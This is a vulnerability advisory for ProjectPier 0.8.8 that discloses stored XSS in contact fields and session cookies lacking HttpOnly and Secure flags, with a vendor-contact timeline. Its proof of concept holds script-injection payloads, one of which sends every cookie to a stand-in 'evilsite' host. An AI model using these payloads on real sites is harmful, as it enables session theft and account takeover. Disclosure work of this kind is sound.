Summary -------------------- Software : ProjectPier Version : 0.8.8 (other versions untested) Website : http://www.projectpier.org Issue : XSS (stored), Insecure Cookie storage CVSS Base : (AV:N/AC:M/Au:S/C:C/I:C/A:N) CVSS Score: 7.9 Researcher: Carl Benedict Product Description -------------------- ProjectPier is a Free, Open-Source, PHP web application for managing tasks, projects and teams through an intuitive web interface. Details -------------------- The ProjectPier web application is affected by stored XSS and insecure cookie storage. The combination of these two vulnerabilities can lead to full compromise of application credentials by stealing session cookies. The stored XSS can be found in the Contact Name, Contact Company Name, Contact Description fields. Proof of Concept -------------------- Enter any of the following strings into the Contact Name, Contact Company Name, and Company Description fields will generate a JavaScript alert dialog when viewing Contacts: <script>alert(1)</script %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e Cookie insecurity: The session cookies are not protected by the HttpOnly or Secure flags, allowing them to be accessed via JavaScript and sent over HTTP. Basic JavaScript alert, returning cookie values: <script>alert(document.cookie)</script JavaScript that sends all cookie values to 'http://evilsite' for logging and reuse on the attacker side: <script>var url1 = "<img src=http://evilsite/" + encodeURIComponent(document.cookie) + ">"; document.writeln(url1); </script History -------------------- 11/07/2012 : Initial contact 11/07/2012 : Vendor response. Fix planned 11/12/2012 : Update requested 05/21/2013 : No updates. Advisory released References -------------------- Bug Report : http://www.projectpier.org/node/4520 Screen Shot: http://www.projectpier.org/files/issues/ppci.jpg Screen Shot: http://www.projectpier.org/files/issues/ppci2.jpg Screen Shot: http://www.projectpier.org/files/issues/ppxss.jpg